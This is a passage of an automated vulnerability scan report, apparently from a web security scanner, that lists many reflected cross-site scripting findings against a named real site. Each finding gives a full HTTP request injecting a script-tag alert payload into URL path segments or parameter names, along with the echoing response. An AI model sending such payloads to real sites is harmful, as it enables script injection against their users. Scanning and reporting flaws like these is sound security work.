Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos17c19<script>alert(1)</script>511f11550db/images/ was not found on this server.</p>
...[SNIP]...

2.2112. http://www.resellerbase.com/detail/30/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c32b2<script>alert(1)</script>0d877038323 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/imagesc32b2<script>alert(1)</script>0d877038323/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/imagesc32b2<script>alert(1)</script>0d877038323/ was not found on this server.</p>
...[SNIP]...

2.2113. http://www.resellerbase.com/detail/30/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 620b8<script>alert(1)</script>bbd1af11bdb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/images/?620b8<script>alert(1)</script>bbd1af11bdb=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.2114. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6ba6c<script>alert(1)</script>ed16785de8b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail6ba6c<script>alert(1)</script>ed16785de8b/30/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail6ba6c<script>alert(1)</script>ed16785de8b/30/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2115. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f9677<script>alert(1)</script>9dc7f8fa4f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30f9677<script>alert(1)</script>9dc7f8fa4f1/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30f9677<script>alert(1)</script>9dc7f8fa4f1/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2116. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f135a<script>alert(1)</script>c7921080622 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themesf135a<script>alert(1)</script>c7921080622/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themesf135a<script>alert(1)</script>c7921080622/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2117. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b5280<script>alert(1)</script>dae3e7fb1a3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmosb5280<script>alert(1)</script>dae3e7fb1a3/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmosb5280<script>alert(1)</script>dae3e7fb1a3/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2118. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a1d12<script>alert(1)</script>110526275cc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/imagesa1d12<script>alert(1)</script>110526275cc/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/imagesa1d12<script>alert(1)</script>110526275cc/rating/ was not found on this server.</p>
...[SNIP]...

2.2119. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload dec28<script>alert(1)</script>f16bdda44a6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/images/ratingdec28<script>alert(1)</script>f16bdda44a6/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/images/ratingdec28<script>alert(1)</script>f16bdda44a6/ was not found on this server.</p>
...[SNIP]...

2.2120. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f7734<script>alert(1)</script>ceb0c40f36a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/images/rating/?f7734<script>alert(1)</script>ceb0c40f36a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/images/rating/?f7734<script>alert(1)</script>ceb0c40f36a=1 was not found on this server.</p>
...[SNIP]...

2.2121. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ea42<script>alert(1)</script>36f18794fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail2ea42<script>alert(1)</script>36f18794fe/30/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:29:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail2ea42<script>alert(1)</script>36f18794fe/30/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2122. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 34e0e<script>alert(1)</script>a610264a474 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3034e0e<script>alert(1)</script>a610264a474/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3034e0e<script>alert(1)</script>a610264a474/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2123. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dd996<script>alert(1)</script>a23172e1e8c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themesdd996<script>alert(1)</script>a23172e1e8c/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themesdd996<script>alert(1)</script>a23172e1e8c/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2124. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f266e<script>alert(1)</script>e1cff2e3f1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmosf266e<script>alert(1)</script>e1cff2e3f1/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmosf266e<script>alert(1)</script>e1cff2e3f1/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2125. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload bfea6<script>alert(1)</script>f9287c9681a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/imagesbfea6<script>alert(1)</script>f9287c9681a/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/imagesbfea6<script>alert(1)</script>f9287c9681a/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2126. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8e78a<script>alert(1)</script>cf397cd02ac was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/images/rating8e78a<script>alert(1)</script>cf397cd02ac/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/images/rating8e78a<script>alert(1)</script>cf397cd02ac/0.gif was not found on this server.</p>
...[SNIP]...

2.2127. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/0.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 80b24<script>alert(1)</script>b2852b3b138 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/images/rating/0.gif80b24<script>alert(1)</script>b2852b3b138 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/images/rating/0.gif80b24<script>alert(1)</script>b2852b3b138 was not found on this server.</p>
...[SNIP]...

2.2128. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 12bd5<script>alert(1)</script>9a94f1fa2a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/images/rating/0.gif?12bd5<script>alert(1)</script>9a94f1fa2a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:29:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/images/rating/0.gif?12bd5<script>alert(1)</script>9a94f1fa2a=1 was not found on this server.</p>
...[SNIP]...

2.2129. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 23f42<script>alert(1)</script>4553f9da45c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail23f42<script>alert(1)</script>4553f9da45c/30/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail23f42<script>alert(1)</script>4553f9da45c/30/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2130. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b6380<script>alert(1)</script>75940babdf9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30b6380<script>alert(1)</script>75940babdf9/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30b6380<script>alert(1)</script>75940babdf9/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2131. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 67c00<script>alert(1)</script>218a5fddf41 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

